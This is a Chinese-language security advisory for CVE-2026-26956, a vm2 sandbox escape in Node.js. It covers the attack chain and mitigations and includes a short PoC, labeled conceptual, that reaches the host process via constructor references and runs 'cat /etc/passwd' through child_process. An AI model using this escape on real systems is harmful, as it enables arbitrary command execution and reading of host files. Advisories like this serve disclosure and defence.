CVE-2026-26956 CVSS 9.8 严重

CVE-2026-26956 vm2沙箱逃逸致任意代码执行漏洞

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-26956

漏洞类型

沙箱逃逸

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

vm2

漏洞概述

vm2是Node.js的一个开源虚拟机和沙箱库。在3.10.4版本中，发现了一个严重的沙箱逃逸漏洞。攻击者通过精心构造的代码在VM.run()中执行，能够成功绕过沙箱隔离机制，直接获取宿主进程对象的引用。这使得攻击者可以在零宿主配合的情况下，以宿主进程权限执行任意系统命令，造成严重的安全风险。该漏洞已在3.10.5版本中修复。

技术细节

该漏洞的根本原因在于vm2沙箱机制在处理特定JavaScript对象或上下文隔离时存在缺陷。vm2旨在提供一个安全的执行环境，但在3.10.4版本中，攻击者能够利用VM.run()接口传入的恶意代码，绕过其内部的安全检查机制。通过利用JavaScript的原型链特性或特定对象的引用机制，攻击者可以从沙箱内部“逃逸”出来，获取到宿主进程的对象引用。一旦获得宿主对象的访问权限，攻击者便不再受沙箱限制，可以直接调用Node.js的核心模块（如child_process）或访问文件系统。由于该漏洞利用无需认证和用户交互，且攻击复杂度低，远程攻击者可轻易接管服务器。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标系统是否使用了Node.js运行环境，并确认其依赖了vm2库的3.10.4或更早版本。

STEP 2

漏洞利用

攻击者向目标应用程序发送特制的恶意JavaScript代码。该代码被应用程序传递给vm2的VM.run()函数执行。

STEP 3

沙箱逃逸

恶意代码在沙箱内执行时，利用vm2的隔离缺陷，通过引用宿主对象构造函数，成功获取到宿主Node.js进程的Process对象。

STEP 4

命令执行

攻击者利用获取的宿主进程权限，调用child_process等模块在服务器上执行任意操作系统命令，完全控制主机。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

const {VM} = require('vm2');
const vm = new VM();

// Conceptual exploit for vm2 sandbox escape
// This payload demonstrates how an attacker might escape the sandbox
const maliciousCode = `
    // Attempting to break out of the sandbox context
    // by accessing the host process object via constructor references
    const hostProcess = this.constructor.constructor('return process')();
    
    // Execute arbitrary command on the host system
    hostProcess.mainModule.require('child_process').execSync('cat /etc/passwd').toString();
`;

try {
    const output = vm.run(maliciousCode);
    console.log('Exploit success. Output:', output);
} catch (e) {
    console.error('Exploit failed or patched:', e);
}

影响范围

vm2 <= 3.10.4

防御指南

临时缓解措施

如果无法立即升级，建议限制对执行vm2代码接口的网络访问，仅允许可信来源调用。同时，降低Node.js应用程序的运行权限，避免使用root账户运行，并利用容器或命名空间技术进一步隔离应用环境，以减小被攻击后的影响范围。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表